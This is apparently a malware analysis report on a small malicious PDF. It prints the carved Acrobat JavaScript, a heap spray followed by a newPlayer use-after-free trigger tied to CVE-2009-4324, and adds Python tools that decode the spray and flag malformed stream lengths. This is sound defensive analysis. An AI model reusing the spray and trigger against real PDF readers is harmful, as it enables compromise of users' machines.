Malicious PDF — malware analysis report

Static analysis result for SHA-256 df6aa5c4a8cb677a…

MALICIOUS

PDF

Size: 1.2 KB    First seen: 2026-05-10
MD5: 693951b9e1ae7010241dd87e508672f7
SHA-1: b21e8f9d3bdedbedd3520478df9e4cdb56b4024c
SHA-256: df6aa5c4a8cb677a4a651746f4c739bb6dae6eb86035fecd3c1b0aaededa58ca
Risk score: 168

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 Command and Scripting Interpreter: JavaScript
(The original mapping to T1059.001 PowerShell is not supported by the sample: the only script it contains is Acrobat JavaScript, and nothing in it references PowerShell.)

The PDF contains embedded JavaScript (PDF_JAVASCRIPT, PDF_JS) carried in object 6. The carved script is obfuscated (PDF_UNESCAPE and the 'Script obfuscation indicators' signal): it assembles its payload from a hex-pair array through string concatenation and unescape('%uXXXX'). Nothing in the recovered script downloads anything: there is no URL, no network or file API call, and the Date objects are only arguments to util.printd. What it does is a heap spray followed by a vulnerability trigger. Wo is built from the Wo1 array (each pair such as '54','EB' becomes the UTF-16 unit 0x54EB, which sits in memory as the bytes EB 54); yR starts as unescape('%u3727%u27f5'), is doubled fifteen times and trimmed so that yR + Wo is exactly 32,768 UTF-16 units (64 KiB); 0x2000 such blocks are then stored in the memory array, roughly 512 MiB of filler followed by shellcode. The three util.printd calls with over-long format strings and the this.media.newPlayer(null) call wrapped in try/catch are the trigger, the same sequence used by public exploits for CVE-2009-4324 (doc.media.newPlayer use-after-free in Adobe Reader/Acrobat 9.x before 9.3 and 8.x before 8.2). The six-byte Wo1 array in the carved preview is far too short to be a working payload, so either the carve is truncated (the stream's /Length is malformed, as flagged below) or the sample is a stripped template; treat the shellcode as unrecovered rather than absent. The trailer's startxref (2491) also points beyond the end of the 1.2 KB file, so any reader has to rebuild the cross-reference table by scanning, consistent with a hand-built or tool-generated exploit file rather than an authored document.
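The string arithmetic described above can be replayed statically to learn what the spray places in memory without ever opening the file in Reader. The Python below is an added example, not output of the analysis platform: it emulates JavaScript unescape() and the UTF-16LE layout of engine strings, then derives the shellcode bytes in memory order and the spray geometry from the carved script, which is copied inline from the preview further down. The regexes assume this script's variable names and loop shapes (Wo1, Wo, yR, memory), and the helper names are the example's own.

```python
import re

# First lines of the carved artifact javascript_obj0006_000.js, copied from the
# preview in this report so the decoder can run offline against it.
SCRIPT = r"""var Wo1 = ['54','EB','75','8B','8B','3C'];
var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i]+Wo1[i+1]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');
for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);
memory=new Array();
for(i=0;i<0x2000;) {
    memory[i]= yR + Wo; i ++;
}
"""

ESC_RE = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')


def js_unescape(s):
    """Emulate JavaScript unescape(): %uXXXX -> one UTF-16 unit, %XX -> one char.
    Sequences that do not parse are left untouched, as the real function does."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def memory_bytes(s):
    """Lay a JS string out as the engine keeps it: UTF-16 little-endian.
    surrogatepass so lone surrogates (common in sprays) do not raise."""
    return s.encode('utf-16-le', 'surrogatepass')


def analyze_spray(script):
    """Statically replay the spray's string building and return its geometry.
    Assumes the shape of this particular script (example helper, not a general tool)."""
    arr = re.search(r"var\s+Wo1\s*=\s*\[([^\]]*)\]", script).group(1)
    pairs = re.findall(r"'([0-9A-Fa-f]{2})'", arr)
    # The script glues consecutive entries into one %uXXXX unit: '54','EB' -> %u54EB.
    # A UTF-16LE unit 0x54EB is stored as bytes EB 54, so the array lists each word
    # swapped relative to the bytes that end up in memory.
    wo = js_unescape(''.join('%u' + a + b for a, b in zip(pairs[0::2], pairs[1::2])))
    seed = js_unescape(re.search(r"yR\s*=\s*unescape\('([^']*)'\)", script).group(1))
    doublings = int(re.search(r"for\(i=0;i<(\d+);\)\{yR\+=yR", script).group(1))
    target = int(re.search(r"substring\(0,\s*(\d+)\s*-\s*Wo\.length\)", script).group(1))
    blocks = int(re.search(r"for\(i=0;i<(0x[0-9A-Fa-f]+|\d+);\)\s*\{\s*memory",
                           script).group(1), 0)
    filler = (seed * (2 ** doublings))[:target - len(wo)]   # yR after the loop and substring
    block_units = len(filler) + len(wo)                     # length of yR + Wo in UTF-16 units
    return {
        'shellcode': memory_bytes(wo),      # payload bytes as they sit in memory
        'filler': memory_bytes(seed),       # repeating filler unit
        'block_units': block_units,
        'block_bytes': block_units * 2,
        'block_count': blocks,
        'total_bytes': blocks * block_units * 2,
    }


if __name__ == '__main__':
    r = analyze_spray(SCRIPT)
    print('shellcode (memory order):', r['shellcode'].hex())
    print('filler unit:', r['filler'].hex())
    print('%d blocks x %d bytes = %d MiB sprayed'
          % (r['block_count'], r['block_bytes'], r['total_bytes'] // 2 ** 20))
```

Against this sample it reports six shellcode bytes (eb 54 8b 75 3c 8b), a filler unit of 27 37 f5 27, and 0x2000 blocks of 64 KiB, i.e. 512 MiB of spray. Six bytes cannot be a complete payload, which is why the carve should be treated as truncated rather than the sample as harmless.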

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (5)

  • PDF_JAVASCRIPT: JavaScript action [low], 2 related findings
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_JS_EXPLOIT_CLUSTER: PDF JavaScript exploit cluster [critical]
    PDF combines an executable JavaScript/action surface with exploit-staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched lines in script:
    var Wo1 = ['54','EB','75','8B','8B','3C'];
    var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i]+Wo1[i+1]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');
  • PDF_JS: Embedded JS stream [low]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_MALFORMED_EXPLOIT_STREAM_LENGTH: Malformed active-content stream length [medium]
    A PDF stream that carries active or exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion tricks and supporting evidence around Reader exploit streams. In this sample the carver produced two candidate bodies for object 6, one stopping at 578 bytes and one running to the end of the file (see Extracted artifacts).
  • EXTRACTED_FILE_STATIC_TRIAGE: Suspicious extracted artifact [info]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
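The /Length check behind PDF_MALFORMED_EXPLOIT_STREAM_LENGTH is simple to reproduce. The Python below is an added example and not the scanner's rule code: it walks stream objects that carry a direct /Length, compares the declared value with the bytes actually found between the stream keyword and endstream, raises the severity when the stream is referenced as a /JS body, and also checks that startxref stays inside the file, the two malformations visible in this sample. The PDF it runs on is constructed inline for the demonstration (it is not the analysed file), and the rule names and function names are the example's own.

```python
import re

# Stream objects with a dictionary: "N G obj << ... >> stream\n". The tempered dot
# stops at "endobj" so a stream-less dictionary cannot swallow the next object.
OBJ_RE = re.compile(rb'(\d+)\s+(\d+)\s+obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n', re.S)
# Direct "/Length 578" versus indirect "/Length 7 0 R" (group 2 set).
LEN_RE = re.compile(rb'/Length\s+(\d+)(?:\s+(\d+)\s+R)?')


def find_streams(pdf):
    """Yield (object number, declared /Length or None if indirect, recovered body length, dict)."""
    for m in OBJ_RE.finditer(pdf):
        objnum, d, start = int(m.group(1)), m.group(3), m.end()
        end = pdf.find(b'endstream', start)
        if end < 0:
            continue
        body = pdf[start:end]
        # The spec puts an EOL before "endstream" that is not counted in /Length.
        if body.endswith(b'\r\n'):
            body = body[:-2]
        elif body.endswith((b'\n', b'\r')):
            body = body[:-1]
        lm = LEN_RE.search(d)
        declared = int(lm.group(1)) if lm and lm.group(2) is None else None
        yield objnum, declared, len(body), d


def check_pdf(pdf):
    """Findings for /Length mismatches (severity raised on script streams) and for a
    startxref that points outside the file. Rule names are this example's own labels."""
    findings = []
    # Objects used as script bodies via "/JS 6 0 R" count as active content.
    script_objs = {int(n) for n in re.findall(rb'/JS\s+(\d+)\s+\d+\s+R', pdf)}
    for objnum, declared, actual, d in find_streams(pdf):
        active = objnum in script_objs or b'/JS' in d or b'/JavaScript' in d
        if declared is not None and declared != actual:
            findings.append({'rule': 'stream-length-mismatch', 'object': objnum,
                             'declared': declared, 'actual': actual, 'active': active,
                             'severity': 'medium' if active else 'low'})
    offsets = re.findall(rb'startxref\s+(\d+)', pdf)
    if offsets and int(offsets[-1]) >= len(pdf):
        findings.append({'rule': 'startxref-out-of-range', 'offset': int(offsets[-1]),
                         'file_size': len(pdf), 'severity': 'low'})
    return findings


def build_sample_pdf():
    """Constructed test file, not the analysed sample: object 4 is an honest content
    stream, object 6 is a /JS stream whose /Length (12) understates its 26-byte body,
    and startxref (2491) lies past the end of the file as in the report above."""
    page = b"BT /F1 12 Tf (hello) Tj ET"
    js = b"var yR=unescape('%u9090');"
    return b"".join([
        b"%PDF-1.4\n",
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>\nendobj\n",
        b"4 0 obj\n<< /Length %d >>\nstream\n" % len(page) + page + b"\nendstream\nendobj\n",
        b"5 0 obj\n<< /S /JavaScript /JS 6 0 R >>\nendobj\n",
        b"6 0 obj\n<< /Length 12 >>\nstream\n" + js + b"\nendstream\nendobj\n",
        b"trailer\n<< /Root 1 0 R /Size 7 >>\nstartxref\n2491\n%%EOF\n",
    ])


if __name__ == '__main__':
    for finding in check_pdf(build_sample_pdf()):
        print(finding)
```

Run against the constructed file it reports one medium-severity mismatch on object 6 (declared 12, recovered 26, referenced from a /JS action) and a startxref of 2491 in a file of a few hundred bytes; the honest object 4 is silent. Indirect /Length references are deliberately skipped rather than resolved, so on real files treat a None result as "not checked", not as "clean".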

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0006_000.js | pdf-javascript-stream | PDF /JS object 6 at offset 0x167 | 578 bytes
SHA-256: 87d95066ee043b694f9047cf9d32dc572ecd506f6daac5ea3d1d0b8a9049a520
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Wo1 = ['54','EB','75','8B','8B','3C'];
var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i]+Wo1[i+1]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
Filename | Kind | Source | Size
javascript_obj0006_001.js | pdf-javascript-stream | PDF /JS object 6 at offset 0x18A | 802 bytes
SHA-256: 8d8d96f3854c7c075a986090c439642532203f0b1e556c27525e400c13d5ce72
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script. This second carve of object 6 continues past endstream through the xref table and trailer to the end of the file, which is what the /Length mismatch flagged in the heuristics looks like on disk.
var Wo1 = ['54','EB','75','8B','8B','3C'];
var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i]+Wo1[i+1]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());

endstream 
endobj xref
0 7
0000000000 65535 f 
0000000015 00000 n 
0000000100 00000 n 
0000000297 00000 n 
0000000148 00000 n 
0000000207 00000 n 
0000000359 00000 n 
trailer

<<
/Root 1 0 R
/Size 7
>>
startxref
2491
%%EOF